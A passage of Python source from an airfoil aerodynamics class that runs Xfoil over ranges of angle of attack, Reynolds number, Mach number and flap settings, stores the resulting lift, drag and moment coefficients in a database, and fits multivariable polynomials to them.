instead of a dictionary. That variable will then not be considered\n a degree of freedom of the database and will not appear in the database.\n \n An example is shown below:\n\n dofs = {\n \"alpha\" : {\n \"range\" : [math.radians(-15.0), math.radians(15.0)],\n \"steps\" : 21,\n \"index\" : 1\n },\n \"Rey\" : 2900000.0,\n \"trailing_flap_deflection\" : {\n \"range\" : [math.radians(-20.0), math.radians(20.0)],\n \"steps\" : 1,\n \"index\" : 0\n },\n \"trailing_flap_fraction\" : 0.25\n }\n\n The above input will run the airfoil through angles of attack from -15 to 15 degrees at a Reynolds number\n of 2900000.0 and through flap deflections from -20 to 20 degrees with a chord fraction of 25%.\n\n If a float, the degree of freedom is assumed to be constant at that value.\n \n If not specified, each degree of freedom defaults to the following:\n\n \"alpha\" : 0.0\n\n \"Rey\" : 1000000.0\n\n \"Mach\" : 0.0\n\n \"trailing_flap_deflection\" : 0.0\n\n \"trailing_flap_fraction\" : 0.0\n\n Please note that all angular degrees of freedom are in radians, rather than degrees.\n\n Currently, the number of steps in Reynolds number multiplied by the number of steps in Mach number\n may not exceed 12. This is due to internal limitations in Xfoil. However, due to the weak dependence\n of airfoil properties on Reynolds number, we do not expect this to be a great hindrance.\n\n N : int, optional\n Number of panel nodes for Xfoil to use. Defaults to 200.\n\n max_iter : int, optional\n Maximum iterations for Xfoil. Defaults to 100.\n\n x_trip : float or list, optional\n x location, non-dimensionalized by the chord length, of the boundary layer trip position. This is \n specified for the top and bottom of the airfoil. If a float, the value is the same for the top\n and the bottom. If a list, the first list element is the top trip location and the second list element\n is the bottom trip location. Defaults to 1.0 for both.
\n\n visc : bool, optional\n Whether to include viscosity. Defaults to True.\n\n N_crit : float, optional\n Critical amplification exponent for the boundary layer in Xfoil. Defaults to 9.0.\n\n update_type : bool, optional\n Whether to update the airfoil to use the newly computed database for calculations. Defaults to True.\n\n show_xfoil_output : bool, optional\n Display whatever Xfoil prints out. Defaults to False.\n\n show_xfoil_plots : bool, optional\n Display Xfoil plots. Defaults to True.\n\n resize_xfoil_window : float, optional\n Resizes the Xfoil window to the given fraction of the screen size. Xfoil defaults to 0.8 window/screen size.\n This variable defaults to None. Has no effect if show_xfoil_plots is False.\n\n CD_type : str, optional\n Which drag coefficient to read in. May be 'total', 'friction', or 'pressure'.\n Defaults to 'total'.\n\n verbose : bool, optional\n Defaults to True\n \"\"\"\n\n # Set up lists of independent vars\n xfoil_args = {}\n self._dof_db_cols = {}\n num_total_runs = 1\n for dof, params in kwargs.pop(\"degrees_of_freedom\", {}).items():\n if dof not in self._allowable_dofs:\n raise IOError(\"{0} is not an allowable DOF.\".format(dof))\n vals, column_index = self._setup_ind_var(params)\n xfoil_args[dof] = vals\n num_total_runs *= len(vals)\n if column_index is not None:\n self._dof_db_cols[dof] = column_index\n\n # Get coefficients\n CL, CD, Cm = self.run_xfoil(**xfoil_args, **kwargs)\n\n # Determine the rows and cols in the database; each independent var and coefficient is a column to be interpolated using scipy.interpolate.griddata\n self._num_dofs = len(list(self._dof_db_cols.keys()))\n num_cols = 3+self._num_dofs\n num_rows = CL.size-np.count_nonzero(np.isnan(CL))\n dof_sorted = sorted(self._dof_db_cols.items(), key=operator.itemgetter(1))\n self._dof_db_order = [x[0] for x in dof_sorted]\n\n # Arrange into 2D database\n self._data = np.zeros((num_rows, num_cols))\n database_row = 0\n coef_shape = CL.shape\n\n for i in range(coef_shape[0]):\n for j in range(coef_shape[1]):\n for k in range(coef_shape[2]):\n for l in range(coef_shape[3]):\n for m in range(coef_shape[4]):\n\n # Check for nan\n if np.isnan(CL[i,j,k,l,m]):\n continue\n\n # Append independent vars to database\n for n, dof in enumerate(self._dof_db_order):\n if dof == \"alpha\":\n ind = i\n elif dof == \"Rey\":\n ind = j\n elif dof == \"Mach\":\n ind = k\n elif dof == \"trailing_flap_deflection\":\n ind = l\n else:\n ind = m\n self._data[database_row,n] = xfoil_args[dof][ind]\n \n # Append coefficients\n self._data[database_row,self._num_dofs] = CL[i,j,k,l,m]\n self._data[database_row,self._num_dofs+1] = CD[i,j,k,l,m]\n self._data[database_row,self._num_dofs+2] = Cm[i,j,k,l,m]\n\n database_row += 1\n\n # Sort by columns so the first column is perfectly in order\n dtype = \",\".join(['i8' for i in range(num_cols)])\n for i in range(self._num_dofs,-1,-1):\n self._data = self._data[self._data[:,i].argsort(axis=0, kind='stable')] # 'stable' option is necessary to maintain ordering of columns not being actively sorted\n\n # Let the user know how much of the design space we actually got results for\n if kwargs.get(\"verbose\", True):\n percent_success = round(self._data.shape[0]/num_total_runs*100, 2)\n print(\"\\nDatabase generation complete.\")\n print(\"Convergent results obtained from Xfoil for {0}% of the requested points.\".format(percent_success))\n\n # Update 
type\n if kwargs.get(\"update_type\", True):\n self.set_type(\"database\")\n\n\n def _setup_ind_var(self, input_dict):\n # Sets up a range of independent variables\n\n # Constant value\n if isinstance(input_dict, float):\n lower = input_dict\n upper = input_dict\n N = 1\n index = None\n log_step = False\n\n # Range\n else:\n limits = input_dict.get(\"range\")\n lower = limits[0]\n upper = limits[1]\n N = input_dict.get(\"steps\")\n index = input_dict.get(\"index\", None)\n log_step = input_dict.get(\"log_step\", False)\n\n # Check that the range will actually have multiple points\n if N == 1:\n raise IOError(\"A range with only one step may not be specified for a degree of freedom. Please give a single float instead.\")\n \n if log_step:\n return list(np.logspace(np.log10(lower), np.log10(upper), N)), index\n else:\n return list(np.linspace(lower, upper, N)), index\n\n\n def export_database(self, **kwargs):\n \"\"\"Exports the database generated by generate_database().\n\n Parameters\n ----------\n filename : str\n File to export the database to.\n \"\"\"\n\n filename = kwargs.get(\"filename\")\n\n # Check the database is there\n if hasattr(self, \"_data\"):\n\n # Create header\n header = []\n\n # Add degrees of freedom\n for dof in sorted(self._dof_db_cols.items(), key=operator.itemgetter(1)):\n header.append(\"{:<25s}\".format(dof[0]))\n\n # Add coefficients\n header.append(\"{:<25s}\".format('CL'))\n header.append(\"{:<25s}\".format('CD'))\n header.append(\"{:<25s}\".format('Cm'))\n header = \" \".join(header)\n\n # Export\n with open(filename, 'w') as db_file:\n np.savetxt(db_file, self._data, '%25.10E', header=header)\n else:\n raise RuntimeError(\"No database has been generated for airfoil {0}. Please create a database before exporting.\".format(self.name))\n\n\n def import_database(self, **kwargs):\n \"\"\"Imports the specified database. Please note that if you have generated your own database not\n using AirfoilDatabase, angle of attack should be stored in radians, rather than degrees.\n\n Parameters\n ----------\n filename : str\n File to import the database from\n\n update_type : bool, optional\n Whether to update the airfoil to use the newly imported database for calculations. Defaults to True.\n \"\"\"\n\n filename = kwargs.get(\"filename\")\n\n # Load data from file\n with open(filename, 'r') as db_file:\n self._data = np.loadtxt(db_file)\n\n # Determine the column indices\n with open(filename, 'r') as db_file:\n header = db_file.readline().strip('#')\n self._dof_db_cols = {}\n self._num_dofs = 0\n for i, col_name in enumerate(header.split()):\n\n # Stop once we get to coefficient columns\n if col_name == \"CL\":\n break\n\n # Add\n self._dof_db_cols[col_name] = i\n self._num_dofs += 1\n\n # Figure out the order of the columns in the database\n dof_sorted = sorted(self._dof_db_cols.items(), key=operator.itemgetter(1))\n self._dof_db_order = [x[0] for x in dof_sorted]\n\n # Update type\n if kwargs.get(\"update_type\", True):\n self.set_type(\"database\")\n\n\n def run_xfoil(self, **kwargs):\n \"\"\"Calls Xfoil and extracts the aerodynamic coefficients at the given state.\n\n Parameters\n ----------\n alpha : float or list of float\n Angle(s) of attack to calculate the coefficients at in radians. Defaults to 0.0.\n\n Rey : float or list of float\n Reynolds number(s) to calculate the coefficients at. Defaults to 1000000.\n\n Mach : float or list of float\n Mach number(s) to calculate the coefficients at. 
Defaults to 0.0.\n\n trailing_flap_deflection : float or list of float\n Flap deflection(s) to calculate the coefficients at in radians. Defaults to 0.0.\n\n trailing_flap_fraction : float or list of float\n Flap chord fraction(s) to calculate the coefficients at. Defaults to 0.0.\n\n N : int, optional\n Number of panels for Xfoil to use. Defaults to 200.\n\n max_iter : int, optional\n Maximum iterations for Xfoil. Defaults to 100.\n\n visc : bool, optional\n Whether to include viscosity. Defaults to True.\n\n x_trip : float or list, optional\n x location, non-dimensionalized by the chord length, of the boundary layer trip position. This is \n specified for the top and bottom of the airfoil. If a float, the value is the same for the top\n and the bottom. If a list, the first list element is the top trip location and the second list element\n is the bottom trip location. Defaults to 1.0 for both.\n\n xycm : list, optional\n x-y coordinates, non-dimensionalized by the chord length, of the reference point for determining the\n moment coefficient. Defaults to the quarter-chord.\n\n N_crit : float, optional\n Critical amplification exponent for the boundary layer in Xfoil. Defaults to 9.0.\n\n show_xfoil_output : bool, optional\n Display whatever Xfoil outputs from the command line interface. Defaults to False.\n\n show_xfoil_plots : bool, optional\n Display Xfoil plots. Defaults to True.\n \n resize_xfoil_window : float, optional\n Resizes the xfoil window to the given fraction of the screen size. Xfoil defaults to 0.8 window/screen size.\n This variable defaults to None. Has no effect if show_xfoil_plots is False.\n\n CD_type : str, optional\n Which drag coefficient to read in. May be 'total', 'friction', or 'pressure'.\n Defaults to 'total'.\n\n verbose : bool, optional\n Defaults to True.\n\n Returns\n -------\n CL : ndarray\n Coefficient of lift. First dimension will match the length of alpha, second will match Rey, etc.\n\n CD : ndarray\n Coefficient of drag. Dimensions same as CL.\n\n Cm : ndarray\n Moment coefficient. 
Dimensions same as CL.\n \"\"\"\n N = kwargs.get(\"N\", 200)\n max_iter = kwargs.get(\"max_iter\", 100)\n verbose = kwargs.get(\"verbose\", True)\n show_xfoil_output = kwargs.get(\"show_xfoil_output\", False)\n x_trip = kwargs.get(\"x_trip\", [1.0, 1.0])\n xycm = kwargs.get(\"xycm\", [0.25, 0.0])\n if isinstance(x_trip, float):\n x_trip = [x_trip, x_trip]\n N_crit = kwargs.get(\"N_crit\", 9.0)\n\n # Get states\n # Angle of attack\n alphas = kwargs.get(\"alpha\", [0.0])\n if isinstance(alphas, float):\n alphas = [alphas]\n first_dim = len(alphas)\n \n # Reynolds number\n Reys = kwargs.get(\"Rey\", [1000000.0])\n if isinstance(Reys, float):\n Reys = [Reys]\n second_dim = len(Reys)\n\n # Mach number\n Machs = kwargs.get(\"Mach\", [0.0])\n if isinstance(Machs, float):\n Machs = [Machs]\n third_dim = len(Machs)\n\n # Flap deflections\n delta_fts = kwargs.get(\"trailing_flap_deflection\", [0.0])\n if isinstance(delta_fts, float):\n delta_fts = [delta_fts]\n fourth_dim = len(delta_fts)\n\n # Flap fractions\n c_fts = kwargs.get(\"trailing_flap_fraction\", [0.0])\n if isinstance(c_fts, float):\n c_fts = [c_fts]\n fifth_dim = len(c_fts)\n\n # xfoil window resizing\n resize_xfoil_window = kwargs.get('resize_xfoil_window', None)\n\n # Initialize coefficient arrays\n CL = np.empty((first_dim, second_dim, third_dim, fourth_dim, fifth_dim))\n CD = np.empty((first_dim, second_dim, third_dim, fourth_dim, fifth_dim))\n Cm = np.empty((first_dim, second_dim, third_dim, fourth_dim, fifth_dim))\n CL[:] = np.nan\n CD[:] = np.nan\n Cm[:] = np.nan\n\n # Clean up from previous iterations (parentheses required; 'and' binds tighter than 'or')\n dir_list = os.listdir()\n for item in dir_list:\n if os.path.isfile(item) and (\".pacc\" in item or \".geom\" in item):\n os.remove(item)\n\n # Loop through flap deflections and fractions\n if verbose:\n print(\"Running Xfoil...\")\n print(\"{0:>25}{1:>25}{2:>25}\".format(\"Percent Complete\", \"Flap Deflection [deg]\", \"Flap Fraction\"))\n print(''.join(['-']*75))\n num_xfoil_runs = fourth_dim*fifth_dim\n for l, delta_ft in enumerate(delta_fts):\n for m, c_ft in enumerate(c_fts):\n \n # Clear pacc file list\n pacc_files = []\n file_id = 0\n \n # Export geometry\n outline_points = \"a_{0:1.6f}_{1:1.6f}.geom\".format(delta_ft, c_ft)\n #outline_points = os.path.abspath(\"xfoil_geom_{0:1.6f}.geom\".format(delta_ft))\n self.get_outline_points(N=N, trailing_flap_deflection=delta_ft, trailing_flap_fraction=c_ft, export=outline_points, close_te=False)\n\n # Display update\n if verbose:\n percent_complete = round((l*fifth_dim+m)/(num_xfoil_runs)*100)\n print(\"{0:>24}%{1:>25}{2:>25}\".format(percent_complete, math.degrees(delta_ft), c_ft))\n\n # Loop through Reynolds number\n for Re in Reys:\n\n # Initialize xfoil execution\n with sp.Popen(['xfoil'], stdin=sp.PIPE, stdout=sp.PIPE) as xfoil_process:\n\n commands = []\n\n # Turn off plots\n if not kwargs.get(\"show_xfoil_plots\", True):\n commands += ['PLOP',\n 'G',\n '']\n elif resize_xfoil_window is not None:\n commands += ['PLOP',\n 'W {}'.format(resize_xfoil_window),\n '']\n\n # Read in geometry\n commands += ['LOAD {0}'.format(outline_points),\n '{0}'.format(self.name)]\n\n # Set panelling ratio and let Xfoil make its own panels\n # This throws a fortran error if the plots are turned off with Xfoil 6.99\n commands += ['PPAR',\n 'N',\n '{0}'.format(N),\n 'T',\n '1',\n '',\n '']\n\n # Set moment reference point\n commands += ['XYCM',\n str(xycm[0]),\n str(xycm[1])]\n\n # Set viscous mode (if desired)\n if kwargs.get(\"visc\", True):\n commands += ['OPER',\n 'VISC',\n '']\n\n 
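# Note: commands are only buffered in this list; they are delivered to Xfoil in a\n # single communicate() call once the full command sequence has been built.\n\n 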
# Set boundary layer parameters\n commands += ['VPAR',\n 'Xtr',\n str(x_trip[0]),\n str(x_trip[1]),\n 'N',\n str(N_crit),\n '',\n '']\n\n # Initialize PACC index\n pacc_index = 0\n\n # Loop through Mach numbers\n for M in Machs:\n\n # Polar accumulation file\n file_id += 1\n pacc_file = \"xfoil_results_{0}.pacc\".format(file_id)\n pacc_files.append(pacc_file)\n\n # Set Mach, Reynolds number, iteration limit, and polar accumulation\n if kwargs.get(\"visc\", True):\n commands += ['OPER',\n 'RE',\n str(Re),\n 'MACH',\n str(M),\n 'ITER {0}'.format(max_iter),\n 'PACC',\n pacc_file,\n '']\n else:\n commands += ['OPER',\n 'MACH',\n str(M),\n 'ITER {0}'.format(max_iter),\n 'PACC',\n pacc_file,\n '']\n\n # Sweep angle of attack\n if len(alphas) == 1:\n commands.append('ALFA {0:1.6f}'.format(math.degrees(alphas[0])))\n\n else:\n # Sweep from the alpha nearest zero up; sweeping unconditionally ensures the\n # nearest-zero alpha is always run, even when it is the last element\n zero_ind = np.argmin(np.abs(alphas))\n for a in alphas[zero_ind:]:\n commands.append('ALFA {0:1.6f}'.format(math.degrees(a)))\n \n # Reset solver\n commands.append('INIT')\n\n # Sweep from the alpha nearest zero down\n if zero_ind != 0:\n for a in alphas[zero_ind-1::-1]:\n commands.append('ALFA {0:1.6f}'.format(math.degrees(a)))\n \n # Reset solver\n commands.append('INIT')\n\n # End polar accumulation\n commands += ['PACC {0}'.format(pacc_index),\n '']\n pacc_index += 1\n\n # Finish commands\n commands += ['',\n 'QUIT']\n\n # Run Xfoil\n xfoil_input = '\\r'.join(commands).encode('utf-8')\n response = xfoil_process.communicate(xfoil_input)\n\n # Show output\n if show_xfoil_output:\n print(response[0].decode('utf-8'))\n if response[1] is not None:\n print(response[1].decode('utf-8'))\n\n # Clean up geometry\n os.remove(outline_points)\n\n # Read in files and store arrays\n for filename in pacc_files:\n\n # Read in file\n try:\n alpha_i, CL_i, CD_i, Cm_i, Re_i, M_i = self.read_pacc_file(filename, CD_type=kwargs.get('CD_type', 'total'))\n except FileNotFoundError:\n warnings.warn(\"Couldn't find results file {0}. Usually an indication of Xfoil crashing.\".format(filename))\n continue\n\n # Determine the Reynolds and Mach indices\n j = min(range(len(Reys)), key=lambda i: abs(Reys[i]-Re_i))\n k = min(range(len(Machs)), key=lambda i: abs(Machs[i]-M_i))\n\n # Loop through alphas\n i_true = 0\n for i_iter, alpha in enumerate(alpha_i):\n\n # Line up with our original independent alpha, as Xfoil does not output a non-converged result\n i_true = min(range(len(alphas)), key=lambda i: abs(alphas[i]-alpha))\n\n CL[i_true,j,k,l,m] = CL_i[i_iter]\n CD[i_true,j,k,l,m] = CD_i[i_iter]\n Cm[i_true,j,k,l,m] = Cm_i[i_iter]\n\n # Interpolate missing values; iterate over the requested alphas, since the\n # coefficient arrays are laid out on those, not on the converged file values\n for i, alpha in enumerate(alphas):\n if np.isnan(CL[i,j,k,l,m]): # Result did not converge\n\n # Mid-value\n if i != 0 and i != len(alphas)-1:\n weight = (alpha-alphas[i-1])/(alphas[i+1]-alphas[i-1])\n CL[i,j,k,l,m] = CL[i-1,j,k,l,m]*(1-weight)+CL[i+1,j,k,l,m]*weight\n CD[i,j,k,l,m] = CD[i-1,j,k,l,m]*(1-weight)+CD[i+1,j,k,l,m]*weight\n Cm[i,j,k,l,m] = Cm[i-1,j,k,l,m]*(1-weight)+Cm[i+1,j,k,l,m]*weight\n\n # Clean up polar files\n os.remove(filename)\n\n return CL, CD, Cm\n\n\n 
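# A minimal usage sketch (hypothetical call, not from the original source): assuming\n # 'airfoil' is an instance with its geometry already set, something like\n # CL, CD, Cm = airfoil.run_xfoil(alpha=[math.radians(a) for a in [-5.0, 0.0, 5.0]], Rey=2.0e6)\n # returns 5D arrays indexed as [alpha, Rey, Mach, flap_deflection, flap_fraction].\n\n\n 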
def read_pacc_file(self, filename, CD_type='total'):\n \"\"\"Reads in and formats an Xfoil polar accumulation file.\n\n Parameters\n ----------\n filename : str\n File to read in.\n\n CD_type : str, optional\n Which drag coefficient to read in. May be 'total', 'friction', or 'pressure'.\n Defaults to 'total'.\n\n Returns\n -------\n alpha : ndarray\n Angles of attack from the accumulation polar, sorted ascending.\n\n CL : ndarray\n Coefficient of lift at each alpha.\n\n CD : ndarray\n Coefficient of drag at each alpha.\n \n Cm : ndarray\n Moment coefficient at each alpha.\n\n Re : float\n Reynolds number for the polar.\n\n M : float\n Mach number for the polar.\n \"\"\"\n\n # Open file\n with open(filename, 'r') as file_handle:\n\n # Read in line by line\n lines = []\n line = file_handle.readline()\n while line:\n lines.append(line)\n line = file_handle.readline()\n\n # Find Mach and Reynolds number\n mr_line = lines[8].split()\n M = float(mr_line[2])\n Re = float(''.join(mr_line[5:8]))\n\n # Collect alpha and coefficients\n alpha = []\n CL = []\n CD = []\n Cm = []\n for line in lines[12:]:\n split_line = line.split()\n alpha.append(math.radians(float(split_line[0])))\n CL.append(float(split_line[1]))\n if CD_type=='total':\n CD.append(float(split_line[2]))\n elif CD_type=='pressure':\n CD.append(float(split_line[3]))\n elif CD_type=='friction':\n CD.append(float(split_line[2])-float(split_line[3]))\n Cm.append(float(split_line[4]))\n\n # Sort in alpha\n sorted_indices = np.argsort(alpha)\n alpha = np.array(alpha)[sorted_indices]\n CL = np.array(CL)[sorted_indices]\n CD = np.array(CD)[sorted_indices]\n Cm = np.array(Cm)[sorted_indices]\n\n return alpha, CL, CD, Cm, Re, M\n\n\n def _create_filled_database(self):\n # Fills in missing values in the database to make it a consistent d-dimensional array.\n\n # Initialize storage for independent vars\n self._dof_filled = []\n for i in range(self._num_dofs):\n self._dof_filled.append([])\n\n # Gather independent vars\n for i in range(self._data.shape[0]):\n for j in range(self._num_dofs):\n\n # Check if the value is already there\n if not self._data[i,j] in self._dof_filled[j]:\n self._dof_filled[j].append(self._data[i,j])\n\n # Sort independent vars and initialize filled array\n shape = []\n for dof in self._dof_filled:\n dof.sort()\n shape.append(len(dof))\n filled_CL = np.zeros(tuple(shape))\n filled_CD = np.zeros(tuple(shape))\n filled_Cm = np.zeros(tuple(shape))\n N = filled_CL.size\n\n # Create grid of independent vars\n raw_grid = np.meshgrid(*self._dof_filled)\n\n # Parse independent vars for passing to getters\n params = {}\n for i, dof in enumerate(self._dof_db_order):\n params[dof] = raw_grid[i].flatten()\n\n # Fill in values\n filled_CL_view = filled_CL.reshape(N)\n filled_CL_view[:] = self.get_CL(**params)\n filled_CD_view = filled_CD.reshape(N)\n filled_CD_view[:] = self.get_CD(**params)\n filled_Cm_view = filled_Cm.reshape(N)\n filled_Cm_view[:] = self.get_Cm(**params)\n\n # Huh. Turns out I don't actually need this, so I'm not going to bother developing it further. But I'll keep it here in case it becomes useful\n\n\n 
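# A hedged usage sketch for the method below (argument values are purely illustrative):\n # my_airfoil.generate_polynomial_fit(CL_degrees={\"alpha\" : 4, \"Rey\" : 1}, CD_degrees=\"auto\")\n 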
def generate_polynomial_fit(self, **kwargs):\n \"\"\"Generates a set of multivariable polynomials using least-squares regression to approximate the database.\n Note: This airfoil must have a database already for fits to be created.\n\n Parameters\n ----------\n CL_degrees : dict or str, optional\n If dict, order of fit polynomial for the coefficient of lift for each degree of freedom,\n formatted as\n\n {\n \"<dof_name>\" : <fit_order>,\n \"<dof_name>\" : <fit_order>,\n ...\n }\n\n Orders must be integers. Defaults to 1 for any not specified.\n\n Can also be specified as \"auto\". In this case, the fit degrees will be determined automatically\n using the method described in Morelli, \"Global Nonlinear Aerodynamic Modeling Using\n Multivariate Orthogonal Functions,\" Journal of Aircraft, 1995. The algorithm tries to minimize\n the RMS error between the data and the prediction while also minimizing the degree of the fit. \n This will automatically determine the fit order for each degree of freedom.\n\n CD_degrees : dict, optional\n Same as CL_degrees.\n\n Cm_degrees : dict, optional\n Same as CL_degrees.\n\n CL_kwargs : dict, optional\n keyword arguments sent to the CL polynomial fit function\n \n When CL_degrees is specified as \"auto\" then CL_kwargs can be\n \n \"max_order\" : int, optional\n gives the max order of polynomial for any one of the independent variables\n to try. Defaults to 6.\n \"tol\" : float, optional\n Gives the cut-off value for any polynomial coefficient to not be included\n in the final results. If a coefficient has an absolute value below tol,\n it won't be included. Defaults to 1e-12.\n \"sigma\" : float, optional\n value used to determine the trade off between how good of a fit to perform\n and how many terms to keep. Defaults to None, which causes the function to\n calculate sigma automatically using the mean squared of the difference of\n the independent variable values with respect to the mean independent\n variable value of the dataset\n \"sigma_multiplier\" : float, optional\n term multiplied onto sigma to change its value. Allows using a multiple\n of the automatically determined sigma value. Defaults to 1.\n \n Otherwise CL_kwargs could be\n \n \"interaction\" : boolean, optional\n value with default set to True. This variable determines whether or not\n interaction terms are included in the fit function. If set to True,\n interaction terms up to the max order for each independent variable are\n included, i.e. if Nvec = [3,2] then the highest interaction term included\n is x_1^3*x_2^2. Specific interaction terms can be omitted using the\n constraints input\n \"sym\" : list, optional\n Defaults to an empty list. If used, the length should be V and each element\n should contain a boolean, True or False. The ith element determines if the\n ith independent variable is symmetric either even or odd, which is\n determined by the order given in Nvec. This will also remove the\n corresponding interaction terms if they are enabled.\n \"sym_same\" : list, optional\n Defaults to an empty list. If used, the entries in the list should be\n tuples with two integers. The integers represent the independent variables\n to which the \"same\" symmetry condition will be applied. The \"same\" symmetry\n forces all interaction terms with exponents of the two independent\n variables that are either odd-odd or even-even to zero\n \"sym_diff\" : list, optional\n Defaults to an empty list. Similar to \"sym_same\" except it enforces the\n \"diff\" symmetry condition, which forces all interaction terms with exponents\n of the two independent variables that are either odd-even or even-odd to\n zero\n \"zeroConstraints\" : list, optional\n Defaults to an empty list. Entries in the list contain integer tuples of\n length V. The integer values represent the powers of the independent variables\n whose coefficient will be forced to 0 before the best fit calculations are\n performed, allowing the user to omit specific interaction terms or regular\n polynomial terms\n \"constraints\" : list, optional\n Defaults to an empty list. 
Entries in the list contain tuples of length 2.\n The first entry is a list of integers that represent the powers of the\n independent variables whose coefficient will then be forced to be equal to the\n second entry in the tuple, which should be a float.\n \"percent\" : boolean, optional\n Default set to False. When set to True the least squares is performed on the\n percent error squared. This option should not be used if y contains any zero\n or near zero values, as this might cause a divide by zero error.\n \"weighting\" : function, optional\n Defaults to None. If given, weighting should be a function that takes as\n arguments x, y, and p where x and y are the independent and dependent\n variables defined above and p is the index representing a certain data point.\n weighting should return a 'weighting factor' that determines how important\n that datapoint is. Returning a '1' weights the datapoint normally.\n \n CD_kwargs : dict, optional\n Same as CL_kwargs\n\n Cm_kwargs : dict, optional\n Same as CL_kwargs\n\n update_type : bool, optional\n Whether to update the airfoil to use the newly computed polynomial fits for calculations. Defaults to True.\n\n verbose : bool, optional\n Defaults to True.\n \"\"\"\n\n # Check for database\n if not hasattr(self, \"_data\"):\n raise RuntimeError(\"No database found! Please generate or import a database before trying to create polynomial fits.\")\n\n # Determine what the maximum fit order is for autoPolyFit\n CL_degrees = kwargs.pop(\"CL_degrees\", {})\n CD_degrees = kwargs.pop(\"CD_degrees\", {})\n Cm_degrees = kwargs.pop(\"Cm_degrees\", {})\n CL_kwargs = kwargs.pop(\"CL_kwargs\", {})\n CD_kwargs = kwargs.pop(\"CD_kwargs\", {})\n Cm_kwargs = kwargs.pop(\"Cm_kwargs\", {})\n verbose = kwargs.pop('verbose', True)\n if verbose: print('Generating Polynomial Fits for airfoil {}'.format(self.name))\n CL_kwargs['verbose'] = verbose\n CD_kwargs['verbose'] = verbose\n Cm_kwargs['verbose'] = verbose\n\n # CL\n if verbose: print('Performing CL curve fit')\n if CL_degrees==\"auto\":\n self._CL_poly_coefs, self._CL_degrees, self._CLfit_R2 = autoPolyFit(self._data[:,:self._num_dofs], self._data[:, self._num_dofs], **CL_kwargs)\n\n elif isinstance(CL_degrees, dict):\n\n # Sort fit degrees\n self._CL_degrees = []\n for dof in self._dof_db_order:\n self._CL_degrees.append(CL_degrees.get(dof, 1))\n\n # Generate\n self._CL_poly_coefs, self._CLfit_R2 = multivariablePolynomialFit(self._CL_degrees, self._data[:,:self._num_dofs], self._data[:, self._num_dofs], **CL_kwargs)\n\n else:\n raise IOError(\"Fit degree specification must be 'auto' or type(dict). Got {0} type {1}.\".format(CL_degrees, type(CL_degrees)))\n \n # CD\n if verbose: print('Performing CD curve fit')\n if CD_degrees==\"auto\":\n self._CD_poly_coefs, self._CD_degrees, self._CDfit_R2 = autoPolyFit(self._data[:,:self._num_dofs], self._data[:,self._num_dofs+1], **CD_kwargs)\n\n elif isinstance(CD_degrees, dict):\n\n # Sort fit degrees\n self._CD_degrees = []\n for dof in self._dof_db_order:\n self._CD_degrees.append(CD_degrees.get(dof, 1))\n\n # Generate\n self._CD_poly_coefs, self._CDfit_R2 = multivariablePolynomialFit(self._CD_degrees, self._data[:,:self._num_dofs], self._data[:,self._num_dofs+1], **CD_kwargs)\n\n else:\n raise IOError(\"Fit degree specification must be 'auto' or type(dict). 
Got {0} type {1}.\".format(CD_degrees, type(CD_degrees)))\n \n # Cm\n if verbose: print('Performing Cm curve fit')\n if Cm_degrees==\"auto\":\n self._Cm_poly_coefs, self._Cm_degrees, self._Cmfit_R2 = autoPolyFit(self._data[:,:self._num_dofs], self._data[:,self._num_dofs+2], **Cm_kwargs)\n\n elif isinstance(Cm_degrees, dict):\n\n # Sort fit degrees\n self._Cm_degrees = []\n for dof in self._dof_db_order:\n self._Cm_degrees.append(Cm_degrees.get(dof, 1))\n\n # Generate polynomial fit\n self._Cm_poly_coefs, self._Cmfit_R2 = multivariablePolynomialFit(self._Cm_degrees, self._data[:,:self._num_dofs], self._data[:, self._num_dofs+2], **Cm_kwargs)\n\n else:\n raise IOError(\"Fit degree specification must be 'auto' or type(dict). Got {0} type {1}.\".format(Cm_degrees, type(Cm_degrees)))\n\n # Store limits\n self._dof_limits = []\n for i in range(self._num_dofs):\n self._dof_limits.append([np.min(self._data[:,i]), np.max(self._data[:,i])])\n\n # Update type\n if kwargs.get(\"update_type\", True):\n self.set_type(\"poly_fit\")\n \n self._CLfit_RMS, self._CLfit_RMSN = multivariableRMS(self._data[:,:self._num_dofs], self._data[:,self._num_dofs], self._CL_poly_coefs, self._CL_degrees, verbose=verbose)\n self._CDfit_RMS, self._CDfit_RMSN = multivariableRMS(self._data[:,:self._num_dofs], self._data[:,self._num_dofs+1], self._CD_poly_coefs, self._CD_degrees, verbose=verbose)\n self._Cmfit_RMS, self._Cmfit_RMSN = multivariableRMS(self._data[:,:self._num_dofs], self._data[:,self._num_dofs+2], self._Cm_poly_coefs, self._Cm_degrees, verbose=verbose)\n \n if verbose:\n print('\\nCL fits\\n'+'='*20)\n print('R^2 : {}'.format(self._CLfit_R2))\n print('RMS : {}'.format(self._CLfit_RMS))\n print('RMSN: {}\\n'.format(self._CLfit_RMSN))\n print('CD fits\\n'+'='*20)\n print('R^2 : {}'.format(self._CDfit_R2))\n print('RMS : {}'.format(self._CDfit_RMS))\n print('RMSN: {}\\n'.format(self._CDfit_RMSN))\n print('Cm fits\\n'+'='*20)\n print('R^2 : {}'.format(self._Cmfit_R2))\n print('RMS : {}'.format(self._Cmfit_RMS))\n print('RMSN: {}\\n'.format(self._Cmfit_RMSN))\n\n\n def export_polynomial_fits(self, **kwargs):\n \"\"\"Save the polynomial fit to a JSON object.\n\n Parameters\n ----------\n filename : str\n JSON object to write polynomial fit data to.\n\n write_limits : bool, optional\n Whether to limit the polynomial fits based on the original range of data.\n Defaults to True.\n\n \"\"\"\n\n # Get filename\n filename = kwargs.get(\"filename\")\n\n # Create export dictionary\n export = {}\n export[\"tag\"] = \"Polynomial fit to database for {0} airfoil.\".format(self.name)\n export[\"degrees_of_freedom\"] = self._dof_db_order\n if kwargs.get(\"write_limits\", True):\n export[\"limits\"] = self._dof_limits\n export[\"defaults\"] = self._dof_defaults\n export[\"fit_degrees\"] = {}\n export[\"fit_degrees\"][\"CL\"] = self._CL_degrees\n export[\"fit_degrees\"][\"CD\"] = self._CD_degrees\n export[\"fit_degrees\"][\"Cm\"] = self._Cm_degrees\n export['fit_error'] = {}\n export['fit_error']['CL'] = {}\n export['fit_error']['CL']['R^2'] = self._CLfit_R2\n export['fit_error']['CL']['RMS'] = self._CLfit_RMS\n export['fit_error']['CL']['RMSN'] = self._CLfit_RMSN\n export['fit_error']['CD'] = {}\n export['fit_error']['CD']['R^2'] = self._CDfit_R2\n export['fit_error']['CD']['RMS'] = self._CDfit_RMS\n export['fit_error']['CD']['RMSN'] = self._CDfit_RMSN\n export['fit_error']['Cm'] = {}\n export['fit_error']['Cm']['R^2'] = self._Cmfit_R2\n export['fit_error']['Cm']['RMS'] = 